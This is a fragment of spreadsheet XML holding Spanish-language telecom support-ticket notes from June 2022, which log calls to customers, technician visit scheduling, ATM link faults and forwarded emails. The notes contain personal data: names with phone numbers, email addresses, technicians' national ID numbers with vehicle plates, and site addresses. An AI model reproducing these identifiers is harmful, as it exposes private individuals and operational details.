    <t>SE LLAMA A CLIENTE ANDREA VASQUEZ 55553646 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001931199 - 2001931302</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ANDREA VASQUEZ 55553646 NO RESPONDE, ENVIA A BUZON
-ID 2001511702 - 2001511552</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE BYRON DÍAS 42827211 NO RESPONDE, ENVIA A BUZON
-ID 2001886522</t>
  </si>
  <si>
    <t>HAY SEGUIMIENTO VÍA CORREO DONDE SE DARÁ SEGUIMIENTO HASTA EL DÍA LUNES, CLIENTE PLANTEA LOS SIGUIENTES HORARIOS SEGÚN TICKET INTERNO:
09:00AM A 12:00PM
14:00 A 17:00 HORAS
19:00 EN ADELANTE</t>
  </si>
  <si>
    <t>SE ENVÍA CORREO AL CLIENTE, SE TIENE VISITA COORDINADA PARA EL DÍA LUNES 13/06 A LAS 9:00AM.
DE: HUGO JOSE SOTO SAMAYOA &lt;HUGO.SOTO@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 10 DE JUNIO DE 2022 16:12
PARA: LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; ANDREA VÁSQUEZ &lt;ASISTENTEGT@REGISTREK.COM&gt;; JOSE ANGEL GODINEZ OVALLE &lt;JANGEL.GODINEZ@CLARO.COM.GT&gt;
CC: GUSTAVO ADOLFO BARAHONA PUTUL &lt;GUSTAVO.BARAHONA@CLARO.COM.GT&gt;; KANDY KRYSTINA CORONADO RAMON &lt;KANDY.CORONADO@CLARO.COM.GT&gt;; JAVIER HIDALGO &lt;JHIDALGO@REGISTREK.COM&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CENTRO DE SERVICIO DE ALTUS &lt;SOPORTE@ALTUS.CO.CR&gt;; ETHEL ROLDAN &lt;EROLDAN@REGISTREK.COM&gt;; ISO.CNOC.ACCESOS &lt;ISOCNOCACCESOS@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD APETURA DE TICKET PARA CLARO GT
BUENAS TARDES,
POR ESTE MEDIO SE LES INFORMA QUE LA VISITA TÉCNICA SE VA A REALIZAR EL DÍA LUNES 13/06 A LAS 9:00AM.
SALUDOS.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  ANDREA VASQUEZ 55553646 NO RESPONDE, ENVIA A BUZON
-ID 2001885784</t>
  </si>
  <si>
    <t>SE ENVÍA CORREO A CLIENTE SOLICITÁNDOLE APOYO PARA SEGUIMIENTO Y/O CIERRE TICKET:
ASUNTO: RE: SOLICITUD APETURA DE TICKET PARA CLARO GT</t>
  </si>
  <si>
    <t>SE ENVIO CORREO AL CLIENTE.
BUENAS TARDES,
COMPARTO LA IP DEL SERVIDOR.
LA IP ES LA 10.197.0.99.
MENSAJES OPTION.
SALUDOS.</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE DANIELA RAMOS Y COMUNICO A SU SOPORTE, EL IT LE EXPLICO AL CLIENTE QUE PRIMERO TIENEN QUE REVISAR LAS CONEXIONES FÍSICAS EN GUATEMALA, CLIENTE DARÁ SEGUIMIENTO A NIVEL INTERNO, PERO NO AUTORIZO EL CIERRE DEL TICKET Y SOLICITO QUE SE MANTUVIERA ABIERTO POR SI NECESITAN SOPORTE
3001652645
COLA:
NOMBRE: A: 0050622804433
NÚMERO: 0050622804433
ESTADO: CONECTADA
DURACIÓN: 0:13:15
DETALLES: 0050622804433
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSEGODINEZ
FECHA Y HORA LOCALES: 16/06/2022 17:09:30</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE DANIELA RAMOS 5062105400  INDICA QUE ESTA REALIZANDO PRUEBAS CON SU EQUIPO DE TELEFONÍA Y RESPONDERÁ VÍA CORREO
3001503005
COLA:
NOMBRE: A: 0050621054000
NÚMERO: 0050621054000
ESTADO: CONECTADA
DURACIÓN: 0:06:10
DETALLES: 0050621054000
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSEGODINEZ
FECHA Y HORA LOCALES: 16/06/2022 09:36:11</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE ANDREA VASQUEZ 55553646 INDICA QUE YA RECIBIÓ EL CORREO Y ESTA COORDINANDO LOS PERMISOS, CONFIRMARA VÍA CORREO
2001424820
DE: JOSE ANGEL GODINEZ OVALLE &lt;JANGEL.GODINEZ@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 10 DE JUNIO DE 2022 11:22
PARA: LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; ANDREA VÁSQUEZ &lt;ASISTENTEGT@REGISTREK.COM&gt;; GUSTAVO ADOLFO BARAHONA PUTUL &lt;GUSTAVO.BARAHONA@CLARO.COM.GT&gt;
CC: KANDY KRYSTINA CORONADO RAMON &lt;KANDY.CORONADO@CLARO.COM.GT&gt;; JAVIER HIDALGO &lt;JHIDALGO@REGISTREK.COM&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CENTRO DE SERVICIO DE ALTUS &lt;SOPORTE@ALTUS.CO.CR&gt;; ETHEL ROLDAN &lt;EROLDAN@REGISTREK.COM&gt;; ISO.CNOC.ACCESOS &lt;ISOCNOCACCESOS@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD APETURA DE TICKET PARA CLARO GT
BUENOS DÍAS, SE ADJUNTAN LOS DATOS SOLICITADOS, LA VISITA SE COORDINARA PARA EL DÍA LUNES 13/06/2022 Y QUEDARÍAMOS AL PENDIENTE QUE NOS CONFIRMEN EL HORARIO DE INGRESO, DATOS DE LA AGENCIA (BLVD LOS PROCERES 24-69 ZONA 10 EMPRESARIAL ZONA PRADERA TORRE 1 NVEL 14 OF 1405). QUEDAMOS ATENTOS A SUS COMENTARIOS.
                TÉCNICOS                                                 IDENTIFICACIÓN                          VEHICULOS
MARLON ENRIQUE MUÑOZ ORELLANA          1582 46500 1801          P-0173JFM NISSAN MARCH
JOSÉ ALBERTO IXPATA TOJ                                  1660 02313 1503          P-0440HSR NISSAN MARCH
JUAN JOSE RODRIGUEZ PAZ                                2494 43260 0208         P-740GTV NISSAN MARCH
JAVIER DANILO CHETE CHAJON                          2149 40594 0103         P-0275HNJ FRONTIER
LUIS EMILIO GONZALEZ CATALAN                      2530 48877 0101         P-0273HNJ FRONTIER
PEDRO EDUARDO TOT MARTINEZ                      1681 34810 0101         P-0055GLD NISSAN SENTRA
MILTON ENRIQUE SALAZAR PÉREZ                     2626 48784 0101         P- 0439HSR NISSAN MARCH
EDGAR DANIEL GOMEZ MENDEZ                       1628 97243 1401          P-0905HNK NISSAN MARCH
JUAN ALBERTO TRUJILLO ORTIZ                          2487 19076 0115          P-0354HMP NISSAN MARCH
DANIEL ENRIQUE MONTENEGRO                        2414 54425 0101         P-0617GVT NISSAN MARCH
ERWIN EDUARDO DEL CID DUBON                     1981 48798 0101          P-049JNR NISSAN
HERRAMIENTAS Y EQUIPAMIENTO:
LAPTOP
MOCHILA
KIT CABLES DE RED
PACH CORD DE FIBRA Y UTP (1)
ALICATES
DESARMADORES
EQUIPO ONT HUAWEI
SALUDOS,</t>
  </si>
  <si>
    <t>SE LLAMA A BYRON DÍAS 42827211 PERO NO CONTESTA, SE INTENTARA EN UNOS INSTANTES
LLAMADA REALIZADA DESDE VIVO</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANDREA VASQUEZ 55553646  SOLICITA QUE SE LE LLAME A LAS 16:00 HRS NUEVAMENTE YA QUE CONSULTARA CON SU SOPORTE INTERNO  **
-ID 2001254682
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANDREA VASQUEZ 55553646 NO RESPONDE || SE INTENTARA LUEGO **
-ID 2001233719
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ANDREA VASQUEZ 55553646 ENVIA DIRECTO A BUZON, SE INTENTARA LUEGO
-ID 2001235286</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE BYRON DÍAS 42827211 NO REPONDE, SE INENTARA LUEGO
-ID 2001370930</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ANDREA VASQUEZ 55553646 NO RESPONDE, ENVIA A BUZON
-ID 2001370329</t>
  </si>
  <si>
    <t>F4595435</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A INGENIERIA--
RE: DISEÑO 1235431OH</t>
  </si>
  <si>
    <t>F4595458</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS RAMOS-47690132 ## ENVIA A BUZON ## SE INTENTARA NUEVAEMNTE EN BREVE
2001197936
COLA:
NOMBRE: A: 47690132
NÚMERO: 47690132
DURACIÓN: 0:00:19
ESTADO: CONECTADA
DETALLES: 47690132
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 9/06/2022 11:20:31
2001198033
COLA:
NOMBRE: A: 47690132
NÚMERO: 47690132
DURACIÓN: 0:00:05
ESTADO: MARCANDO
DETALLES: 47690132
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 9/06/2022 11:20:39</t>
  </si>
  <si>
    <t>CLIENTE CARLOS RAMOS-47690132 INDICA QUE YA TODO OK ##POSIBLE PROBLEMA  A NIVEL LAN ##
2001201397
COLA:
NOMBRE: A: 47690132
NÚMERO: 47690132
DURACIÓN: 0:02:08
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 47690132
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 9/06/2022 11:31:56</t>
  </si>
  <si>
    <t>SE TIENE A CLIENTE EN LINEA ## CARLOS RAMOS-47690132##
2001201397
COLA:
NOMBRE: A: 47690132
NÚMERO: 47690132
DURACIÓN: 0:00:56
ESTADO: CONECTADA
DETALLES: 47690132
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 9/06/2022 11:30:38</t>
  </si>
  <si>
    <t>F4595460</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE VERONICA MENDOZA 77015639 - 72454566 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001203333 - 2001203218</t>
  </si>
  <si>
    <t>F4595472</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  CARLOS CHICA 78561862 - 22099027 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001205809 - 2001206066</t>
  </si>
  <si>
    <t>CLIENTE CARLOS CHICA 78561862  REALIZA PRUEBAS DE LLAMADAS HACIA PANAMÁ Y VALIDA QUE YA ESTÁN COMPLETANDO. SE PROCEDERÁ A INFORMAR A SOPORTE CORPORATIVO
RESULTADO: LLAMADA HECHA
NOMBRE: 0050378561862
NÚMERO: 0050378561862
INICIO: HOY, 11:00 A. M.
FIN: HOY, 11:05 A. M.
DURACIÓN: 5:10
ID DE LLAMADA: 2001849946</t>
  </si>
  <si>
    <t>SE LE SOLICITA AL CLIENTE CARLOS CHICA 78561862  QUE REALICE PRUEBAS DE LLAMADAS HACIA PANAMÁ, CLIENTE SOLICITA SE LE LLAME EN 20 MINUTOS EN LO QUE HACE PRUEBAS. ID DE LLAMADA: 2001829924</t>
  </si>
  <si>
    <t>CLIENTE CARLOS CHICAS 78561862 ID: 3001041217 SE ENCUENTRA REALIZANDO PRUEBAS DE LLAMADA HACIA PANAMÁ, LUEGO DE LA PRUEBA DE AYER DONDE YA COMPLETABAN SUS LLAMADAS CLIENTE SOLICITÓ EL DÍA DE HOY PARA REALIZAR PRUEBAS, SOLICITA SE LE LLAME A LAS 16:00 HORAS.</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE CARLOS CHICA 78561862 PARA SOLICITAR SU APOYO EN REALIZAR PRUEBAS, PERO COMENTA QUE EN ESTE MOMENTO NO PUEDE REALIZARLAS, INDICA QUE ESTARÁ HACIENDO PRUEBAS DE SU LADO Y QUE SE LE LLAME A LAS 15:00 HORAS. ID DE LLAMADA: 2001224776</t>
  </si>
  <si>
    <t>CLIENTE INDICA QUE NO LOGRA REALIZAR LLAMADAS INTERNACIONALES HACIA SU PERSONAL CON NÚMEROS CLARO EN PANAMÁ. COMENTA QUE LLAMA DESDE SU GDN 22099000  HACIA LOS NÚMEROS DE EJEMPLO 00507 64411600 Y 00507 62725455. SE REALIZA LLAMADA DE PRUEBA DESDE CIC AL 00507 64411600 Y ATIENDE PERSONAL DE PANAMA. SE CONSULTARÁ CON CX SI CLIENTE TIENE ALGUN BLOQUEO. ID DE LLAMADA: 2001205423</t>
  </si>
  <si>
    <t>F4595481</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  NOHEMI BONILLA 26802627 MENCIONA QUE EL SERVICIO PRESENTA MUCHA LENTITUD, SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 2001208605 - 1001209256</t>
  </si>
  <si>
    <t>F4595486</t>
  </si>
  <si>
    <t>CLIENTE ESTUARDO BYRON TARAT LLAMA DEL 30164447 ID 2001261735 PARA EL SEGUIMIENTO DEL CASO SD1133600  SE LLAMA AL GESTOR A CARGO ALEJANDRO.NAVARRO AL 8126 ID  2001262291 Y NO ESTA DISPONIBLE. SE LLAMA NUEVAMENTE A LA EXT 8126 ID 2001262852 ATIENDE LESTER QUIEN VALIDARA QUIEN PUEDE APOYAR YA QUE COMENTA QUE NO ES DE ESA ÁREA Y TRANSFIERE A DARWIN  Y NO ATIENDE SE ESCALA CON EL TEAM LIDER JUAN MANUEL CARDONA AL 41287321 ID  2001264248 Y COMENTA SE LLAME A OTRO GESTOR Y AL RETOMAR AL GESTOR SE RETOMA AL CLIENTE POR EL TIEMPO  DE ESPERA Y COMENTA QUE YA LE FUNCIONA SOLICITA MONITOREO HASTA LAS 18:00 HORAS SE NOTIFICA AL GESTOR. ALEJANDRO.NAVARRO VIA SKYPE</t>
  </si>
  <si>
    <t>F4595500</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE RESPONDE EDDY MENCIONA QUIEN CONFIRMA VISITA PARA LAS 12
-ID 2001386622</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  LUIS BOSARREYES  PBX: 2420 7200 	EXT. 2415 CONTESTA EL SEÑOR DANIEL CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 2001467629 - 2001467956
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE, MENCIONA QUE YA ESTAN COORDINADOS LOS PERMISOS PARA LA VISITA A LAS 11:00 HRS
-ID 2001379635</t>
  </si>
  <si>
    <t>###SE ENVIA CORREO AL CLIENTE PARA QUE ESTE ENTERADO DE LA VISITA A LAS 12 PM ##
DE: VELDIN JANITZIO PALENCIA FLORES &lt;VELDIN.PALENCIA@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 10 DE JUNIO DE 2022 9:35
PARA: ENLACES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5B@5B.COM.GT &lt;SERVICIOS5B@5B.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: GESTIÓN DE PERMISOS | 47502564T |TRANSACCIONES Y TRANSFERENCIAS | CAJERO 4049 TIENDA LA BENDICION, 2 AV. Y 7 C. 2-05 SIQUINALA, ESCUINTLA
MUY BUEN DÍA ESTIMADOS.
DISCULPEN LA MOLESTIA CON REFRERENCIA PARA COORDINAR LA VISITA, QUISIERAMOS PODER PEDIR APERTURA DEL CAJERO A LAS 12 PM DEL DIA DE HOY  PARA QUE EL TECNICO LLEGUE CON TODO EL EQUIPO NECESARIO PARA RESOLVER LA FALLA.
SALUDOS</t>
  </si>
  <si>
    <t>###SE ENVIA CORREO AL CLIENTE PARA GESTIONAR PERMISOS PARA HOY A LAS 11 AM ###
DE: VELDIN JANITZIO PALENCIA FLORES
ENVIADO: VIERNES, 10 DE JUNIO DE 2022 9:10
PARA: ENLACES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5B@5B.COM.GT &lt;SERVICIOS5B@5B.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: GESTIÓN DE PERMISOS | 47502564T |TRANSACCIONES Y TRANSFERENCIAS | CAJERO 4049 TIENDA LA BENDICION, 2 AV. Y 7 C. 2-05 SIQUINALA, ESCUINTLA
BUENAS TARDES ESTIMADOS,
EN SEGUIMIENTO AL SERVICIO   47502564T |TRANSACCIONES Y TRANSFERENCIAS | CAJERO 4049 TIENDA LA BENDICION, 2 AV. Y 7 C. 2-05 SIQUINALA, ESCUINTLA
SOLICITAMOS DE SU APOYO GESTIONANDO ACCESOS PARA EL PERSONAL TÉCNICO PARA EL DÍA DE HOY A LAS 11:00 AM.
TECNICOS:
NOMBRE:   AXEL DANILO ZARPEC SAZO
 DPI: 1624525270501
QUEDAMOS ATENTOS A SUS COMENTARIOS
SALUDOS CORDIALES</t>
  </si>
  <si>
    <t>F4595502</t>
  </si>
  <si>
    <t>AVANTEC ESTA TRABAJANDO EN EL SITIO INDICA SUPERVISOR QUE ESTA EN COMUNICACION CON TECNICOS DE CAMPO SE LE LLAMARA NUEVAMENTE EN 1 1/2 HORAS SEGUN SUS INDICACIONES
2001353211
COLA:
NOMBRE: A: 50433902044
NÚMERO: 50433902044
DURACIÓN: 0:04:28
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 50433902044
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JANTONIO.FERNANDEZ
FECHA Y HORA LOCALES: 10/06/2022 08:18:16</t>
  </si>
  <si>
    <t>2001360086
COLA:
NOMBRE: A: 50489904208
NÚMERO: 50489904208
DURACIÓN: 0:01:22
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 50489904208
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JANTONIO.FERNANDEZ
FECHA Y HORA LOCALES: 10/06/2022 08:34:27
SIN ENERGIA SE NOTIFICA CAMBIO DE ESTATUS A SUPERVISOR</t>
  </si>
  <si>
    <t>CLIENTE SIN ENERGIA ELECTRICA SE NECESIA TRABAJAR CON GENERADOR
2001353211
COLA:
NOMBRE: A: 50433902044
NÚMERO: 50433902044
DURACIÓN: 0:04:28
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 50433902044
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JANTONIO.FERNANDEZ
FECHA Y HORA LOCALES: 10/06/2022 08:18:51</t>
  </si>
  <si>
    <t>F4595526</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
JUAN PABLO MORALES BARRONDO
JUE 09/06/2022 3:32 P.M.
PARA:
JOSE.GAITAN@WALMART.COM;
CAM-CCINFR@WAL-MART.COM;
CNOCCA;
FONSECA BUSTAMANTE, KEVYN ANTON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5526
ID: 344400874T¿
IDENTIFICADOR DEL CLIENTE: CC_WALMART_UTILITARIOS_GT_4094
CALLE REAL Y 3 AVENIDA ESQUINA CANTON AGUA TIBIA PALENCIA  ¿
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIO.
SALUDOS.</t>
  </si>
  <si>
    <t>F4595532</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARTHA CASTILLO 25913485 MENCIONA QUE NO SE ENCUENTRA EN PR POR LO QUE SOLICITA VISITA TECNICA
-ID 2001223877
NOMBRE DEL CLIENTE: INSTITUTO SALVADORENO DEL SEGURO SOCIAL
UBICACIÓN:COLONIA CUSCATLAN BARRIO SAN SEBASTIAN CALLE A LA PEDREDA LOCAL #510 APOPA DEPARTAMENTO DE SAN SALVADOR
CONTACTO EN SITIO: DR. JOSE SORIANO
HORARIO DE ATENCION:HASTA LAS 15 HRS
GESTIÓN DE PERMISOS: DATOS DE PERSONAL TECNICO -- MARTHA.CASTILLO@ISSS.GOB.SV</t>
  </si>
  <si>
    <t>F4595549</t>
  </si>
  <si>
    <t>SE PROCEDE A DEJAR EN MONITOREO PARA PODER PROSEGUIR A VALIDAR CON CLIENTE EL DIA DE MAÑANA</t>
  </si>
  <si>
    <t>F4595554</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARTHA CASTILLO 25913485 RESPONDE PERO CORTA LA LLAMADA, SE INTENTARA LUEGO
-ID 2001256284</t>
  </si>
  <si>
    <t>F4595560</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  ROMAIN RIVERA AL  9666-7507 CLIENTE NO RESPONDE || SE INTENTARA LUEGO **
ID 2001219536 - 2001220029
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  ROMAIN RIVERA AL  9666-7507 CLIENTE NO RESPONDE || SE INTENTARA LUEGO **
ID 2001231135
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  ROMAIN RIVERA AL  9666-7507 INDICA QUE EN EL LUGAR NO HAY ENERGIA YA QUE TUVIERON UN CORTO CIRCUITO Y AUN NO LO HAN ARREGLADO **
ID 2001238491
**</t>
  </si>
  <si>
    <t>F4595569</t>
  </si>
  <si>
    <t>CLIENTE IDNICA QUE RESETEO EL E1 Y SERVICIO RESTABLECEIO ##RALIZA PRUEBAS Y TODO OK ##VALIDA</t>
  </si>
  <si>
    <t>SE LLAMAA C LEINTE JAIRO MEDINA-55668592   SE TIENE EN LINEA ##
2001212528
COLA:
NOMBRE: A: 55668592
NÚMERO: 55668592
DURACIÓN: 0:00:17
ESTADO: CONECTADA
DETALLES: 55668592
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 9/06/2022 12:01:49</t>
  </si>
  <si>
    <t>F4595578</t>
  </si>
  <si>
    <t>CASO ASIGNADO A MARVIN TOC DE 5B
SERVICIOS 5B &lt;SERVICIOS5B@TYT.COM.GT&gt;
ESTIMAD@ KENNY.RIVERA, SU SOLICITUD  760199 HA SIDO ASIGNADA A MARVIN TOC.
INFORMACIÓN DE LOS DATOS
SOLICITANTE
 KENNY.RIVERA
EMAIL
 KENNY.RIVERA@CLARO.COM.GT
ESTADO
 EN EJECUCIÓN
DESCRIPCIÓN DEL REQUERIMIENTO
ESTIMADO CLIENTE,
REFERENTE AL ENLACE EN EL ATM: CC_TYT_GT_ATM1634, SOLICITAMOS SU APOYO VALIDANDO QUE LOS EQUIPOS ESTÉN CONECTADOS A UN UPS Y ESTE SE ENCUENTRE EN BUEN ESTADO, YA QUE SE OBSERVA EN NUESTRO MONITOREO REINICIOS CONSTANTES SOBRE EL EQUIPO TELDAT Y EL EQUIPO DE MARCA ASMI54L EN EL ATM, ESTO PARA QUE LOS EQUIPOS PUEDAN FUNCIONAR DE MANERA ADECUADA Y EVITAR DAÑOS FUTUROS A LOS YA MENCIONADOS. QUEDO AL PENDIENTE DE SUS COMENTARIOS.
TICKET: F4595578
ID: 47502148T
IDENTIFICADOR DEL CLIENTE: CC_TYT_GT_ATM1634
UBICADO EN: CARRETERA AL ATLANTICO 0-006 BASE MILITAR MARISCAL ZABALA ZONA 17, GUATEMALA, AREA DE RESTAURANTES.
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>SE DA SEGUIMIENTO, SE SOLICITA APOYO A CLIENTE PARA REVISION DE UPS EN ATM POR REINCIDENCIA
KENNY ROBERT RIVERA JUAREZ
ESTIMADO CLIENTE,
REFERENTE AL ENLACE EN EL ATM: CC_TYT_GT_ATM1634, SOLICITAMOS SU APOYO VALIDANDO QUE LOS EQUIPOS ESTÉN CONECTADOS A UN UPS Y ESTE SE ENCUENTRE EN BUEN ESTADO, YA QUE SE OBSERVA EN NUESTRO MONITOREO REINICIOS CONSTANTES SOBRE EL EQUIPO TELDAT Y EL EQUIPO DE MARCA ASMI54L EN EL ATM, ESTO PARA QUE LOS EQUIPOS PUEDAN FUNCIONAR DE MANERA ADECUADA Y EVITAR DAÑOS FUTUROS A LOS YA MENCIONADOS. QUEDO AL PENDIENTE DE SUS COMENTARIOS.
TICKET: F4595578
ID: 47502148T
IDENTIFICADOR DEL CLIENTE: CC_TYT_GT_ATM1634
UBICADO EN: CARRETERA AL ATLANTICO 0-006 BASE MILITAR MARISCAL ZABALA ZONA 17, GUATEMALA, AREA DE RESTAURANTES.
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>MARVIN TOC INDICA QUE SE REVSA ATM Y QUE FUE NECESARIO REINICIAR VARIAS VECES POR CONFIGURACION, SE REENVIA CORREO A GRUPO DE CNOC PARA SU SEGUIMIENTO, VALIDAR CON PERSONAL DE MONIOREO EL DIA DE MAÑANA EN HORARIO HABIL
SERVICIOS 5B &lt;SERVICIOS5B@TYT.COM.GT&gt;
BUENA TARDE SE REVISA ATM Y FUE NECESARIO REINICIAR  VARIAS VECES POR CONFIGURACIÓN
MARVIN TOC
SERVICIOS 5B
PBX: (502) 2420-7200
************************************************************______************************************************************
 09/06/2022 21:02:38 GUATEMALA/CENTRO AMERICA (KENNY ROBERT RIVERA JUAREZ):
MARVIN TOC DE 5B INDICA QUE SE PROCEDE A REVISION
SERVICIOS 5B &lt;SERVICIOS5B@TYT.COM.GT&gt;
BUENA TARDE SE PROCEDE CON LA REVISIÓN
MARVIN TOC
SERVICIOS 5B
PBX: (502) 2420-7200</t>
  </si>
  <si>
    <t>MARVIN TOC INDICA QUE SE REVSA ATM Y QUE FUE NECESARIO REINICIAR VARIAS VECES POR CONFIGURACION
SERVICIOS 5B &lt;SERVICIOS5B@TYT.COM.GT&gt;
BUENA TARDE SE REVISA ATM Y FUE NECESARIO REINICIAR  VARIAS VECES POR CONFIGURACIÓN
MARVIN TOC
SERVICIOS 5B
PBX: (502) 2420-7200</t>
  </si>
  <si>
    <t>MARVIN TOC DE 5B INDICA QUE SE PROCEDE A REVISION
SERVICIOS 5B &lt;SERVICIOS5B@TYT.COM.GT&gt;
BUENA TARDE SE PROCEDE CON LA REVISIÓN
MARVIN TOC
SERVICIOS 5B
PBX: (502) 2420-7200</t>
  </si>
  <si>
    <t>F4595596</t>
  </si>
  <si>
    <t>**SE LLAMA  A CLIENTE FRANCELA BARRERA  89786909 INDICA QUE PERSISTE LA LENTITUD || SE NOTIFICA A GESTOR **
ID 2001228972
**</t>
  </si>
  <si>
    <t>F4595598</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FREDDY DELGADILLO  58567138 MENCIONA QUE HA PRESENTADO INCONVENIENTES CON LAS PERDIDAS DE PAQUETES, CLIENTE REENVIA EL CORREO CON LAS PRUEBAS, SOLICITA SE VALIDE Y SE COMPARTA EL DIAGNOSTICO POR CORREO
RV: PROBLEMAS INTERNET CLARO
-ID 2001216322</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 10 DE JUNIO DE 2022 10:24
PARA: JAIME JOSUE HERNANDEZ CASTILLO &lt;JAIMEJ.HERNANDEZ@CLARO.COM.GT&gt;; FREDDY DELGADILLO &lt;FDELGADILLO@UNICEF.ORG&gt;; GERSON NICOLAS AJPACAJA PONCIO &lt;GERSON.AJPACAJA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: RICARDO JOSE PEREZ RIVAS &lt;RPEREZ@UNICEF.ORG&gt;; BARBARA RUMENOVA PARVANOVA SALOMON &lt;BARBARA.PARVANOVA@CLARO.COM.NI&gt;; XOCHIL MARIA CRISTINA CASTILLO BRAVO &lt;XOCHIL.CASTILLO@CLARO.COM.NI&gt;
ASUNTO: RE: PROBLEMAS INTERNET CLARO
*-*-*-*</t>
  </si>
  <si>
    <t>F4595601</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS GODINEZ 40713166 Y SOLICITA QUE SE LE PROGRAME LA VISITA PARA EL DIA VIERNES 10 A LAS 10:00 AM Y SE LE LLAME 30 MIN ANTES QUE EL PERSONAL TEC ESTE EN EL LUGAR **
GESTION DE PERMISOS: SOLO IDENTIFICADOS
DIRECCION: 8 CALLE 6-31 ZONA 2 QUETZALTENANGO
ATENDERA EN SITIO: CARLOS GODINEZ
-ID 2001236509
**</t>
  </si>
  <si>
    <t>A NIVEL DE CLARO ENLACE OK, CRONOS ANTERIORES INDICAN QUE SE DEBE DAR SEGUIMIENTO Y/O VALIDAR SERVICIO MAÑANA A LAS 08:00AM</t>
  </si>
  <si>
    <t>SE HABLÓ CON CARLOS GODÍNEZ/CLIENTE 40713166 PIDE SE LE LLAME MAÑANA A LAS 15:30 HORAS PARA SEGUIMIENTO Y/O VALIDAR SERVICIO.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS GODINEZ AL 40713166 CLIENTE SOLICITA QUE SE LE LLAME A LAS 16:00 HRS PARA CONFIRMAR **
-ID 2001785775
**</t>
  </si>
  <si>
